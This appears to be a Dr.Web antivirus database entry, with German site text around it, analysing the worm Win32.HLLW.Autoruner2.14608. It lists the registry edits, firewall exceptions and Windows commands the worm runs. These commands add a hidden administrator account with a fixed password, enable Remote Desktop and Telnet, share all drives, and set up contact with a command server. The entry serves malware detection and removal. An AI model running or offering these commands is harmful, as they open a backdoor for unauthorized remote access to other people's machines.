Um eine korrekte Funktionsweise unserer Website zu gewährleisten, müssen Sie die Unterstützung für JavaScript in Ihrem Browser aktivieren.
Win32.HLLW.Autoruner2.14608
Added to the Dr.Web virus database:
2014-05-10
Virus description added:
2014-05-22
Technical Information
To ensure autorun and distribution:
Modifies the following registry keys:
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'LoadOrderVerification' = '%WINDIR%\iexplorer.exe'
Creates the following services:
[<HKLM>\SYSTEM\ControlSet001\Services\TermService] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\lanmanserver] 'Start' = '00000002'
Creates the following files on removable media:
<Drive name for removable media>:\Cristiano Ronaldo.jpg.lnk
Malicious functions:
To bypass firewall, removes or modifies the following registry keys:
[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\tlntsvr.exe' = '<SYSTEM32>\tlntsvr.exe:*:Enabled:iexplorer'
[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%WINDIR%\iexplorer.exe' = '%WINDIR%\iexplorer.exe:*:Enabled:iexplorer.exe'
Creates and executes the following:
Executes the following:
'<SYSTEM32>\netsh.exe' firewall set allowedprogram <SYSTEM32>\tlntsvr.exe iexplorer enable
'<SYSTEM32>\net1.exe' localgroup "Utilisateurs du Bureau р distance" ASPENET /add
'<SYSTEM32>\net1.exe' localgroup "Remote desktop users" ASPENET /add
'<SYSTEM32>\netsh.exe' firewall set service type = fileandprint mode = enable
'<SYSTEM32>\net1.exe' start lanmanserver
'<SYSTEM32>\sc.exe' config lanmanserver start= auto
'<SYSTEM32>\net1.exe' localgroup %USERNAME%s ASPENET /add
'<SYSTEM32>\net1.exe' share b$=b:\
'<SYSTEM32>\net1.exe' share v$=v:\
'<SYSTEM32>\net1.exe' share c$=c:\
'<SYSTEM32>\net1.exe' localgroup administrateurs ASPENET /add
'<SYSTEM32>\net1.exe' user ASPENET 159482637 /add
'<SYSTEM32>\net1.exe' share n$=n:\
'<SYSTEM32>\reg.exe' add "hklm\system\currentcontrolset\control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
'<SYSTEM32>\reg.exe' add "hklm\system\currentcontrolset\control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
'<SYSTEM32>\reg.exe' add "HKLM\software\microsoft\Windows\CurrentVersion\Run" /v LoadOrderVerification /t REG_SZ /d "%WINDIR%\iexplorer.exe" /f
'<SYSTEM32>\net1.exe' user ASPENET /active:yes
'<SYSTEM32>\netsh.exe' firewall add portopening TCP 3389 "Romet Desktop"
'<SYSTEM32>\netsh.exe' firewall add portopening TCP 3389 "Bureau р distance"
'<SYSTEM32>\net1.exe' start TermService
'<SYSTEM32>\sc.exe' start tlntsvr
'<SYSTEM32>\sc.exe' config tlntsvr start= auto
'<SYSTEM32>\reg.exe' add "hklm\system\currentControlSet\Control\Lнsa" /v "forceguest" /t REG_DWORD /d 0x0 /f
'<SYSTEM32>\sc.exe' config TermService start= auto
'<SYSTEM32>\regsvr32.exe' /s <SYSTEM32>\tlntsvrp.dll
'<SYSTEM32>\tlntsvr.exe'
'<SYSTEM32>\net1.exe' share y$=y:\
'<SYSTEM32>\net1.exe' share t$=t:\
'<SYSTEM32>\net1.exe' share r$=r:\
'<SYSTEM32>\net1.exe' share o$=o:\
'<SYSTEM32>\net1.exe' share i$=i:\
'<SYSTEM32>\net1.exe' share u$=u:\
'<SYSTEM32>\net1.exe' share e$=e:\
'<SYSTEM32>\netsh.exe' firewall set service type = remotedesktop mode = enable
'<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List" /v "%WINDIR%\iexplorer.exe" /t REG_SZ /d "%WINDIR%\iexplorer.exe:*:Enabled:iexplorer.exe" /f
'<SYSTEM32>\cmd.exe' /c %WINDIR%\ASPENET.bat
'<SYSTEM32>\net1.exe' share z$=z:\
'<SYSTEM32>\net1.exe' share a$=a:\
'<SYSTEM32>\reg.exe' add "HKLM\software\microsoft\windows NT\CurrentVersion\Winlogon\specialaccounts\UserList" /v ASPENET /t REG_DWORD /d 0 /f
'<SYSTEM32>\net1.exe' share l$=l:\
'<SYSTEM32>\net1.exe' share k$=k:\
'<SYSTEM32>\net1.exe' share j$=j:\
'<SYSTEM32>\net1.exe' share x$=x:\
'<SYSTEM32>\net1.exe' share w$=w:\
'<SYSTEM32>\net1.exe' share m$=m:\
'<SYSTEM32>\net1.exe' share h$=h:\
'<SYSTEM32>\net1.exe' share s$=s:\
'<SYSTEM32>\net1.exe' share q$=q:\
'<SYSTEM32>\net1.exe' share p$=p:\
'<SYSTEM32>\net1.exe' share g$=g:\
'<SYSTEM32>\net1.exe' share f$=f:\
'<SYSTEM32>\net1.exe' share d$=<Drive name for removable media>:\
Modifies file system :
Creates the following files:
%WINDIR%\ASPENET.bat
<Current directory>\SchedLgUt.Txt
%WINDIR%\iexplorer.exe
%WINDIR%\Grpvinc.cpe
Network activity:
Connects to:
'any':58008
'py####a.no-ip.biz':58008
UDP:
DNS ASK py####a.no-ip.biz
Miscellaneous:
Searches for the following windows:
ClassName: '#32770' WindowName: 'Gestionnaire des t?ches de Windows'
ClassName: '#32770' WindowName: '(null)'
ClassName: 'SysListView32' WindowName: 'processus'
ClassName: 'TApplication' WindowName: '<Virus name>'
ClassName: 'MS_WINHELP' WindowName: '(null)'
ClassName: 'TApplication' WindowName: 'iexplorer'
Laden Sie Dr.Web für Android herunter
Kostenlos für 3 Monate
Alle Schutzkomponenten
Verlängerung der Testversion über AppGallery/Google Pay
Wenn Sie diese Webseite weiter benutzen, bedeutet dies, dass Sie mit der Verarbeitung von Cookies sowie dem Einsatz anderer Technologien zur Sammlung von statistischen Nutzerdaten einverstanden sind. Mehr dazu
OK